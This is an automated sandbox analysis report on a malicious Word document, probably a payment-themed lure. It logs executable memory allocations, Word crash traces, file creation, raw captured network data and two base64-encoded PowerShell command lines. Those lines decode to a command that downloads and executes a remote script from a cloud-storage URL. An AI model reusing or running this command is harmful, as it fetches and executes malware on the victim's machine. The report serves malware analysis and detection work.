region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02666000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02667000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02668000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02669000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05050000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05051000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05052000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05053000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05054000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05055000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05056000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05057000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05058000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05059000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0505a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0505b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0505c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0505d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2184
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0505e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Application Crash Process WINWORD.EXE with pid 3036 crashed
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b
NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x750d2b08
NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x750a801a
SLClose-0x28e osppc+0x33cf @ 0x737c33cf
SLLoadApplicationPolicies+0xa99 SLCallServer-0x330 osppc+0x15dba @ 0x737d5dba
SLClose+0x4c4 SLpBeginGenuineTicketTransaction-0x4f79 osppc+0x3b21 @ 0x737c3b21
SLpVLActivateProduct+0xcb SLpGetMSPidInformation-0x111 osppc+0x12074 @ 0x737d2074
SLActivateProduct+0x48e SLInitialize-0x110a osppcext+0x385c7 @ 0x667985c7
??0OdfStgParams@@QAE@XZ+0xbae22 mso+0xfbdd28 @ 0x7098dd28
DllGetLCID+0x5c042 _MsoWebServerSupportEx@12-0x1c8a2b mso+0x6bc415 @ 0x7008c415
_MsoFGetTooltips@0+0x8918 _MsoHrSimpleQueryInterface@16-0x1221a mso+0xc90c4 @ 0x6fa990c4
_MsoFGetTooltips@0+0x88ca _MsoHrSimpleQueryInterface@16-0x12268 mso+0xc9076 @ 0x6fa99076
_MsoPeekMessage@8+0x49a0 _MsoGetStringTypeExW@20-0x1697 mso+0xb724d @ 0x6fa8724d
_MsoCpgFromChs@4+0x14e3 _MsoCrCbvGet@4-0xa6c mso+0x30f14 @ 0x6fa00f14
_MsoGetHmodPTLServices@0+0x4883 _MsoCpgFromChs@4-0x1e10 mso+0x2dc21 @ 0x6f9fdc21
_MsoGetHmodPTLServices@0+0x45f3 _MsoCpgFromChs@4-0x20a0 mso+0x2d991 @ 0x6f9fd991
_MsoGetHmodPTLServices@0+0x326f _MsoCpgFromChs@4-0x3424 mso+0x2c60d @ 0x6f9fc60d
_MsoFCreateIPref@28+0x143f _MsoFUseIEFeature@8-0xee0 mso+0x22ce6 @ 0x6f9f2ce6
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x8007007b
exception.offset: 46887
exception.address: 0x7588b727
registers.esp: 108852260
registers.edi: 108852424
registers.eax: 108852260
registers.ebp: 108852340
registers.edx: 0
registers.ebx: 108853476
registers.esi: 2147942523
registers.ecx: 2147483648
1 0 0

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b
NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x750d2b08
NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x750a801a
SLClose-0x28e osppc+0x33cf @ 0x737c33cf
SLLoadApplicationPolicies+0xa99 SLCallServer-0x330 osppc+0x15dba @ 0x737d5dba
SLClose+0x4c4 SLpBeginGenuineTicketTransaction-0x4f79 osppc+0x3b21 @ 0x737c3b21
SLpGetTokenActivationGrantInfo+0x13c SLpGenerateTokenActivationChallenge-0x11c osppc+0x13102 @ 0x737d3102
SLGetTokenActivationGrants+0x710 SLGetTokenActivationCertificates-0x7a8 osppcext+0x5f7d0 @ 0x667bf7d0
??0OdfStgParams@@QAE@XZ+0xbb1e7 mso+0xfbe0ed @ 0x7098e0ed
??0OdfStgParams@@QAE@XZ+0xbb3c9 mso+0xfbe2cf @ 0x7098e2cf
DllGetClassObject+0x3c2bb _MsoFActivateControl@4-0x25231 mso+0xa84871 @ 0x70454871
DllGetClassObject+0x3c339 _MsoFActivateControl@4-0x251b3 mso+0xa848ef @ 0x704548ef
_MsoFHideTaiwan@0+0x4ccf _MsoSetLVProperty@8-0x7e2a9 mso+0x274ea0 @ 0x6fc44ea0
_MsoFDoSmartTagSecurityCheck@8+0xb6367 _MsoCompareStringA@24-0x391 mso+0x61d7ab @ 0x6ffed7ab
??0OdfStgParams@@QAE@XZ+0xec034 mso+0xfeef3a @ 0x709bef3a
DllGetLCID+0x5c144 _MsoWebServerSupportEx@12-0x1c8929 mso+0x6bc517 @ 0x7008c517
_MsoFGetTooltips@0+0x8918 _MsoHrSimpleQueryInterface@16-0x1221a mso+0xc90c4 @ 0x6fa990c4
_MsoFGetTooltips@0+0x8844 _MsoHrSimpleQueryInterface@16-0x122ee mso+0xc8ff0 @ 0x6fa98ff0
_MsoPeekMessage@8+0x49e5 _MsoGetStringTypeExW@20-0x1652 mso+0xb7292 @ 0x6fa87292
_MsoPeekMessage@8+0x49a0 _MsoGetStringTypeExW@20-0x1697 mso+0xb724d @ 0x6fa8724d
_MsoCpgFromChs@4+0x14e3 _MsoCrCbvGet@4-0xa6c mso+0x30f14 @ 0x6fa00f14
_MsoGetHmodPTLServices@0+0x4883 _MsoCpgFromChs@4-0x1e10 mso+0x2dc21 @ 0x6f9fdc21
_MsoGetHmodPTLServices@0+0x45f3 _MsoCpgFromChs@4-0x20a0 mso+0x2d991 @ 0x6f9fd991
_MsoPeekMessage@8+0x4537 _MsoGetStringTypeExW@20-0x1b00 mso+0xb6de4 @ 0x6fa86de4
_MsoPeekMessage@8+0x446e _MsoGetStringTypeExW@20-0x1bc9 mso+0xb6d1b @ 0x6fa86d1b
_MsoPeekMessage@8+0x16ad _MsoGetStringTypeExW@20-0x498a mso+0xb3f5a @ 0x6fa83f5a
_MsoPeekMessage@8+0x2294 _MsoGetStringTypeExW@20-0x3da3 mso+0xb4b41 @ 0x6fa84b41
_MsoPeekMessage@8+0x1196 _MsoGetStringTypeExW@20-0x4ea1 mso+0xb3a43 @ 0x6fa83a43
_GetAllocCounters@0+0x5006f DllGetLCID-0x1a6bbf wwlib+0x66e37 @ 0x71fb6e37
_GetAllocCounters@0+0x50f95 DllGetLCID-0x1a5c99 wwlib+0x67d5d @ 0x71fb7d5d
_GetAllocCounters@0+0x4d89f DllGetLCID-0x1a938f wwlib+0x64667 @ 0x71fb4667
_GetAllocCounters@0+0x4c3a1 DllGetLCID-0x1aa88d wwlib+0x63169 @ 0x71fb3169
_GetAllocCounters@0+0x4a61e DllGetLCID-0x1ac610 wwlib+0x613e6 @ 0x71fb13e6
wdCommandDispatch-0x964 winword+0x1602 @ 0x2f881602
wdCommandDispatch-0x9cc winword+0x159a @ 0x2f88159a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xc004f011
exception.offset: 46887
exception.address: 0x7588b727
registers.esp: 2081740
registers.edi: 2081904
registers.eax: 2081740
registers.ebp: 2081820
registers.edx: 0
registers.ebx: 2082956
registers.esi: 3221549073
registers.ecx: 2147483648
1 0 0
file C:\Users\test22\AppData\Local\Temp\~$gamento (1).doc
Time & API Arguments Status Return Repeated

NtCreateFile

create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x00000470
filepath: C:\Users\test22\AppData\Local\Temp\~$gamento (1).doc
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$gamento (1).doc
create_options: 4194400 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 0 ()
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBmAGkAcgBlAGIAYQBzAGUAcwB0AG8AcgBhAGcAZQAuAGcAbwBvAGcAbABlAGEAcABpAHMALgBjAG8AbQAvAHYAMAAvAGIALwBmAGkAcgAtADgAYwAxADQAZgAuAGEAcABwAHMAcABvAHQALgBjAG8AbQAvAG8ALwBqAG8AZAAuAGoAcABnAD8AYQBsAHQAPQBtAGUAZABpAGEAJgB0AG8AawBlAG4APQAzADcAMwA1AGYAMQBjAGMALQAzADUAZAAwAC0ANABjAGUAYQAtADgAYQAyADkALQA4ADEAMQBjAGUAYwA3ADEAZgBlADEAYgAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA""
cmdline Powershell -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBmAGkAcgBlAGIAYQBzAGUAcwB0AG8AcgBhAGcAZQAuAGcAbwBvAGcAbABlAGEAcABpAHMALgBjAG8AbQAvAHYAMAAvAGIALwBmAGkAcgAtADgAYwAxADQAZgAuAGEAcABwAHMAcABvAHQALgBjAG8AbQAvAG8ALwBqAG8AZAAuAGoAcABnAD8AYQBsAHQAPQBtAGUAZABpAGEAJgB0AG8AawBlAG4APQAzADcAMwA1AGYAMQBjAGMALQAzADUAZAAwAC0ANABjAGUAYQAtADgAYQAyADkALQA4ADEAMQBjAGUAYwA3ADEAZgBlADEAYgAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA""
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received W
Data received SdŽvvúë¤`•;TМÊÆ,;Îö°DOWNGRD <ú ŠDž"~rÈ(¼šL½£º:AA¦‚b£~†£iÀ ÿ 
Data received &
Data received ’
Data received ŽAQ¥»¢šLµnÉÏMGB&0± ¿ðâÐÈfäé(I°š~|–p˜ W®à֚èE•_ϋN†¾ë+E}ÁG0E!ïê0h(¢g^”ܾOV0æP Öfi¹ŒöCêþ”1 buWp w$°>‡¹ýú2ÄzP£NñØÿц°ü 
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received ) lðŽÌ5;›‡“ȆÎê  XqÆ9˜Ùöíñž ©z¿À÷7†©bþÐe„¦
Data received p
Data received Fރ㠓d(ðã¦Ï EöB_"˜œüÀÇæ;ÇqÚQ%¦|dY_~!Šl‰ŠÃ÷±„¢Z,Šèº)öÝ$ºãh/ÁèŒÎ}¶qÙ|ÈF“m¾ 網×óy[+1ÉõS7eIw2?tÐ1´öaÐÐIÙL-;áå·2#ô´X®%_ÚÀ㢄P Á §Ý/!8r•@,Åà=ÿÄ$Îќ]ýRHyüø0AÒ C˺·Ú  <0`nb2²B÷ŠÆŸd»aîdR¬«ü•9×¼gƒÍYàµØ¤@´H¸òÆ·o0ã{Jjëê7b„SF¬vÖzA¢°u¼ ¿ÀS­Fhó-V.9Ob…±»,­àK¡Ö‚Bîª Ì|lj2Ùznx¶XââÍå¥-''8u—Íß·Põ{¢ÙXÕÎ÷OR‚åf£—zrzh¨ôÎù «’›½ Ž~¼¬[“Þ7•ù';P{͸Ãý!œKùie¯•ˆú™ÐG SÙ.WX1òpÊÃ̅ÀÝ#Œ¥  Äž|ZŠ¦kuÈØ#Ö 9%²—Ó¿û&JѦ¡ní˜Je=Ø¿ï{ôórV|že\>úc@ë dxñ*‘_3êu²ºuuôqégö[”ÙŽ¤n•ÌÕ$bþ¿9Š? ÁôH(¾¦sR3cã…\±mݬèó#0¨ZÊà|!KT|/)Áj++ŸU¾¢;MݹẰ]ð6î«Ú7Ð"Ub‡¼áHبD2¼a­w<—:4?†ÍgÇ®çÍímZ˜ ^è@ pG˜·Zóq§ôñWï˜Q.Ì{€v¿Îc=×Ç.`¾}ÖóñR\tÏó Gxi(ì|P¨iÎD²¥?Ò¼%0>jo"xöë9Ÿvba…?fv›T6¤ÁlÈ͹ÖÜêzÖ1¥Éº4R²0¡L–uèÀw1ë˜fÞNˆ#2n!íöŽd |âå{MÌÍé(9Fø—Ön‘öðgæãîJ6×Ï,Œ8ªmø*‰ìtÑf5šÒrÌ"°m7yƒû¢„БEJXöüëî7½ÛÞSE1tb%ɨ.ié {ší® Ú`ZÕ*´ôwpËo‰O©›²PH Ck5ÉÖÚ}KódõQýÀFå#ðøé8çQäG¶ Ù>«ÛÅêâÓ3Áx‰sÌ{*B è[û‘1)˜LlŸ_Gßÿ럌'ˆíˆØf˜~ÖØ£;‚RPŸé`GùµÑsVçVh½¼ü¬®úaºëfkw8ê+§ásHœZ+ÕÚ0Ú\E—…ÎǪݑ½™.§¤!€\î픩*Ó½1l ë¼îyPÒ9J‹o0®K>V’Jx…„epõjÌc‹gµ(Oóú= $*1ÚÃP۟Eä=¸2j¨ÖÞ,-fç-óèP¶Î~؝NÁxû¹Ü¶:šO1;¢Ý:˜Û4ÊÉA>êº ùÙüïc¬¶h›@âüDý¢Øët@~…êirõŒÀËÝÍÐっ!µ!kq®,!£ãV¹ŽËƒÖÎÄÇáñÎNεúœ¥¾2'':4‹Ûs• Zuxߦ¹ô;YfÉÐþ{ûåÍlñäé¼BdîÑ*,ˆï,ª&ôË×qöÜ9(íìKu÷ƒRÁdÝ°0Ã/c’ý]qr™‚h^(R} Áªh9ßA–¶$+r’9§íääWϒ±óAh¹°zðŒ®¦€»Æ• ³³Îð%m¨sÂW¢ch°ÀE–%>š3-¹¯ÏJ̇e¦Œö4Ð%E¼>ÿqÏæZ
Data received ¦]¤p/W·5 ¦éM(äÈñ҆bÝ?ß`Àç'ßäS8õi½;½NrM•êüá QC¦tSŠD|Y«5é€M¦³ëñ§b] OœfšŽå¾˜­|=¢OZ‰ñæCPò’zÈ£Áݬu`ó I#C,½„IŽ3hàʇ¡&7W\̳'‘Ex#Þ»±¤Å^èÀo¼F0!Ž"Ý]<hÛùìwM¬Ï'ÙGPXÁ 6ы]Úrk~cä» ¿‡§ÕM{¸P‘%øŒnmˆñÉj—Îl͕‰€\¨Å1qbeփB·73(¢åVGú²•´¤ýø–_iëÿ3¡Â«ñµÉîC¶'a¯JòÖÖ£ú‹Ž¸nïZ!óÿ\³)x[Û¡ã–Òœ¡©£'iÈ ‹ì×ó·WFy5U•»~þ¹$"IéÝÙqÜtjýí”!SC[ç1xrÔ*iAýHö¨7½—ÉÉÛÄøvƳ*Fëà È?²ì_àº0¢¥±fþ{ð(áÔñ kÈ }òµì}€ú±6\È$bôÇoEé~;pý~öÆȟg¸Ä™f0ûyÄ »Ì„ÃÎâó‘ ՝ä³<c"AÉW¿¦Ã’‚:ýG˜Ï@¥´™ ·QÔKê…ü‰$ý讽üø5قˆöôÃäÐóHCÌ4O<,Gߎ˲äw§áúñ·&yÿiüµU‹ZK"é4:pçoÔ«cډ¯«´½„Úsûiñ!5ê.§‡°bHÞù+¯[ã¶ÃÑ.Áb͒þ?²ÙiߧœÃŽ¶ WgλÍç¾”„pGéZÇ «þ©Ééíå9çÒªå‰åD¹©µãÖ $Úg¶Ì;ÒÆözúÔõèï­ãÀvG,2ó7¸[&ÿ¸§°P¶ÂמB~>E@ëÛö3Ü˖w-iM¦¦U!ìi³¬ñRÜXˆ÷¡ĂBf)-¨r ±[E¡Uõ¾—ÂÕǁ‘ÚNcՌëµñúàM¡ ƒ,C Ÿá x±–æK¾^õ!á\» ˜µŒÇTè3Ÿs°ªìêa†1ÈFHƗ^¶5ޚˆ”çœÇV¦ÂzM#<rX=Jݎ؉ì$¾ƒV¸Oׯ~“SÞf%bXlÜ%>ßf«ù3 3X…½0ÍÃmŠR½¢±>íøùc`MëJ‚×t”hº…'ðF= òñ'C¨÷–ªwÜ&˜|š=Ÿ|‘ª•}é'‡Þ­¶‘¡”Ósù åQ™/ÿ"µ•Fgæ«N²eÌ ÿ"DHk¢fms֕˜®cÃëÌÚõ’‰ãGËôz2§ìY)ِ÷‰âi’‰¿Lw«\¨Xž,ª‚‘Ãger+;F5Ü.%ê CàÞØJp°»¨‚ãË¢º3EèZ…%mJ³3ÐÁÝl ûB’¶'Õpiíà𳿐¢X‰Ëšž~ÿ¤ -‚ä’w<[¤8ˆB¢ˆåÌNS:ó3»;Šx€×¯-¦}¤Ï˜³FÏÔé^<¢úœˆj’•:©‰¥x{0Éü›3@»ä Íy¯"W º3ô$v«6Ue=LäJ?›,#Å&Z¿°Ï)ʪ;©!w¤‘nˆ‚•½ý}œŒ™Ø‰>˶šZ:~ýZËfRŒœH þnÇÅF§jMKÈwf—0-á{ Ð¤Ð ­š}VXõœ›k§ÅBd÷kºF‡ 6À<[$Fƒo)0kͫЌ½aiß¼Xé…?³?{R¾#@eæ┆˜± ®|áõAnÿùêRµ¸Gٓ2Dš g&»“”äÊ[¥nÁëpèfaNŠTí(dÆÁ˜
Data received ”©|<[DÉTÿ©I…ªz Qÿ‚]z8ŽY‹Z+é!½”ü ÁÐþҙ"èu,N²ùtjF4×ØQGôMf´ìhÖµ;üþþÐ÷œ€$© ´–ćNF¤‚@"%­A’ #—ä¦ÖpB’ è“èt¨¤yÎïAX ÅzjÓU߂À&‚o\7¹jòeŽ žU—‰•÷égˆ–~þú aæN?IӁž•bÂ$qdÔ¦ú&Œh¾—„ÆײuÍÀúìóS¾ïFéxÜÈÏÒL$ð”У¿±…ôáÍÎ펯Z,¯®ŠÑOóö{¬ˆ6ÊG(Žˆ®±´Ø©/_ýµƒ!×e!ÞdZ—™"_PUø™O«ìÑA;¤K¶œUOGŠ°r©zölgW ¤šÍÓ=ÃK¸X±ùÛÔºÑq_þ\Ù¹E6Š¨d"zšÝTIߞ Ï·ÁÅJj›üfíÑöû ìǵqv—õ^;ãµ(¡yÑd%N[2Y•,½OÊfaoX 7¤P~〠tðÙçNh’mÀ¹ÉûñîT•ä4ä>Ú4´™ô ؀P`¦¼Þe§~d~rïæ[¸oøO’ŽL*ÕÖf3yÔ6݈HÐvkw§Bý” +3Ž·ý{ª¡ùޏQÅ$ ¬ÞĶÌõF’8r#¬g_I‰3d™€FF ¸vJgþ ?´þ’eÐûè‘úA­–¬Ä ™ cêv<rM2QmøÌ[‡znœ-êð¥[”tX Ó\ôÓ©ÙÉcþ‚%z=ÎþOùç#l]_EyëHjÓ¾°øòºw O•üîæè}wē$‚î+ýêóUÀ«S®q±×—·Ò›3Ÿ¼µá©Ø-fµÖ\ݛJÛz¡ÚFlÆRv¶Sô#ƒ¦( ÖO0í?’0ËoŒ­,»O½¾8 'èÅ\ヸãͪ.·ÇyTü&npÄÖ!êï([Ýö ՛%RÛY ¦ ê³a¹ð¨¶.Öäð÷s­‘‡ ђ_²u叹ÜÎÙX:‹3Š—ýÕè^ ø·]ÍNžpI!KDð¿˜ÜÌHêOûæòËju¹PøMÖ'GÕ ™EË$âؿ﯇s;TÎó잪ãÒÏ &.yÎžý(„Ö¸–àaÍùæ`b+¾WÝm Bží'•ô†V•0hÁ  ”ë9“%ř1šhd£µ0L ŸIFYká]Q"þëÖV¶ñ} ü•÷IBÌÆÛ,‚^`©D祖ÿ‘Éâò^ñO5Ê;PH”UãvËnØE[4½ðX­£U‰Vì‡þl¢ç_¦B¯*(ÚrW£u›OÀá^ç ø ®¸|ø'´e2ü~è䗦äö;ð\ ÷§â‡ùpl`¥Èi ÷wZŠ ‹.;xÁ2÷<€¨§BäILÏõã•õêH䒟º‹Ô‡>çôî餋O_-N¢ë­6ý,ohŒ6ØÇyÌÏåZiCΕÙåÞ¤—é™òœÍ@—FyEOe¯w;A?°±Þ³šÞΰÍPÒ\°ÿò¾hıò•¬ÿ‚oÁŠÛå¬4?¬/šƒ¿@3G!ªº”ëäHH5z¢v&ŒbtX1zÁՐÜSý ó¸Šà(œ'ªxÙgf”îÂŸXôè\8ç½éß2Ù¢–_Mõà6"ËOO/óVN¸úI*¶ëÚWW¯ÎåõD i»9Γ# í> M@.w% –¨må¯ï zû†Cªâ×k¬öÏ;ªÆŸ]͟í‹Ä>3¶ñt\ÉCŠi½+väòSp$Jy}È÷î¾1©ÈŽ°íÔÿìËÖÆ`ã
Data received ª¿¶Î"(Ã&!£3(‰jQ£™f¿=”œ¡Â“jÜaœKàÿ'h!š™\èߋÒ+Ìñ'Pj…:Áè·f¬åi¹5pcŽßqª†Ï))ƒôH<RdA»ßcñ¬v¶Á¯fŠüF7Ä37Œ* -à³Oþ'h¹Dß+÷EÆǁJt§Œ¾Ä‚ôOp¶h•À\éz¨Äù½£š°3¾¾Õ`֎[ZG07 ö@]thð8‹ÛªiI~E"èpûÞp^ˆ*:XÅ"Ѧï+…U—}Z}QsS““-ÇŽy^,”U¯ç›ëÀ:o÷@Û8{è5Ú(bàn­¾ü2²9zýìÝ´þó €È$]ÓYŒýT1ð/ØL»ãÎuu‚œ±z O·76æ؉†ÕÕ¼ÊÍ'y¶Cœº£ÄŒ$NrÔ4*ã¹&pÑèÁd+«F2?dáÈ ï…h=yζ› Ýè±Í©àِ†èÀ$8k’B›Ÿ†+ŒxŒI'>¦zNp®1çŠXã‚WØUa`U,¼óJ%ÜQÚ{ðM‘…gâ9n·’¿¤èÚvˆËùr$¹Þäƒt3ýÔýMh)¡ÂŸ¯À=Û„T§è¶‹î1ßös‹Én­dc§}ÁM~ԓ©O«÷P’‘Oÿdg â'¯A2ö(þ™o"1‘VÕÕþ(a՘˜$½¾[á%TQoQuÒ/‡¤’ª{q–ôTÌ:×*ﺉÎï&åæ@ñ®_€Z€Þ¹46œÏÀ²ÆdKû’‰îÃ;>)镝î”bä72 ÷ôõ´³’üž#Ā¬¨J J´éXòŒjŒBð„õHÏfx¡N:SÍ+¢èöÊދX’{‹…ç3à4jÿ ¹§…_%ë[hRQ˜! ìÓfX)S~”vpÿýGà–ÛôýÓý¶bpŸfgyäކ}öϓÆUR%á}æ3û=%ž§ëˆRÛoæ{Þ8øoP‰ø1Â¸ƒtè0°'œf>Ќ}ßPRÉÌtGKEÛ¤íÜ4ïä¥¥ð>…˜st´Ü̿͒œßW1»­3ßíóÎ*˜†ÄÖsýuÀDN#b~³~cÂ5Ws‘‘‡6óÞáí-ý}½Å¬Ý¸ØFëí&FÚ¨(™IH´ØVŽgy‹² —‘j n̛í–aü÷Of:ï¡Ñl&µ6Ú)Üé7‰õK2«¥BkåñŦwÅû;ó–ûÎ?b?z9µç‡jSd«±Öœ%4\ ¾¦F#²ð à ç…ZZ\aY!¹Wºž`ٛ!±Ô¬'µgøï@̖xB¤ÌܘÝ]fi$Âÿ r'ûy~ËÜæ¾Á]½ÿ©qOÊ˶…hQuªšOðC}2y6@ÕäýÕ¿,M«k#}3 